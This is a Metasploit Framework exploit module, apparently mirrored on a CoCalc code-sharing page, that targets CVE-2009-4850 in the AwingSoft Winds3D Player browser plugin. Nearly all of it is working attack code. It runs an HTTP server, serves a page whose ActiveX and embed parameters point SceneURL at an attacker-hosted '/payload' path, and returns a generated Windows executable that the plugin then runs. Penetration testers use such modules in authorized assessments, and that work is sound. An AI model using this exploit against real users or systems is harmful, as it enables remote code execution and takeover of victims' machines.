Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/browser/awingsoft_winds3d_sceneurl.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = ExcellentRanking
8
9
include Msf::Exploit::Remote::HttpServer::HTML
10
include Msf::Exploit::EXE
11
12
def initialize(info = {})
13
super(
14
update_info(
15
info,
16
'Name' => 'AwingSoft Winds3D Player 3.5 SceneURL Download and Execute',
17
'Description' => %q{
18
This module exploits an untrusted program execution vulnerability within the
19
Winds3D Player from AwingSoft. The Winds3D Player is a browser plugin for
20
IE (ActiveX), Opera (DLL) and Firefox (XPI). By setting the 'SceneURL'
21
parameter to the URL to an executable, an attacker can execute arbitrary
22
code.
23
24
Testing was conducted using plugin version 3.5.0.9 for Firefox 3.5 and
25
IE 8 on Windows XP SP3.
26
},
27
'License' => MSF_LICENSE,
28
'Author' => [
29
'jduck' # original discovery & metasploit module
30
],
31
'References' => [
32
[ 'CVE', '2009-4850' ],
33
[ 'OSVDB', '60049' ]
34
],
35
'Payload' => {
36
'Space' => 2048,
37
'StackAdjustment' => -3500,
38
},
39
'Platform' => 'win',
40
'Targets' => [
41
[ 'Automatic', {}],
42
],
43
'DisclosureDate' => '2009-11-14',
44
'DefaultTarget' => 0,
45
'Notes' => {
46
'Reliability' => UNKNOWN_RELIABILITY,
47
'Stability' => UNKNOWN_STABILITY,
48
'SideEffects' => UNKNOWN_SIDE_EFFECTS
49
}
50
)
51
)
52
end
53
54
def on_request_uri(cli, request)
55
payload_url = "http://"
56
payload_url += (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
57
payload_url += ":" + datastore['SRVPORT'].to_s + get_resource() + "/payload"
58
59
if (request.uri.match(/payload/))
60
return if ((p = regenerate_payload(cli)) == nil)
61
62
data = generate_payload_exe({ :code => p.encoded })
63
print_status("Sending EXE payload")
64
send_response(cli, data, { 'Content-Type' => 'application/octet-stream' })
65
66
# Handle the payload
67
# handler(cli)
68
return
69
end
70
71
# otherwise, send the html..
72
html = %Q|<html>
73
<body>
74
<object classid='clsid:17A54E7D-A9D4-11D8-9552-00E04CB09903'
75
codebase='http://www.awingsoft.com/zips/WindsPly.CAB'>
76
<param name="SceneURL" value="#{payload_url}#">
77
<embed type="application/x-awingsoft-winds3d" src="#{payload_url}">
78
</object>
79
|
80
81
print_status("Sending #{self.name} HTML")
82
# Transmit the compressed response to the client
83
send_response(cli, html, { 'Content-Type' => 'text/html' })
84
end
85
end
86
87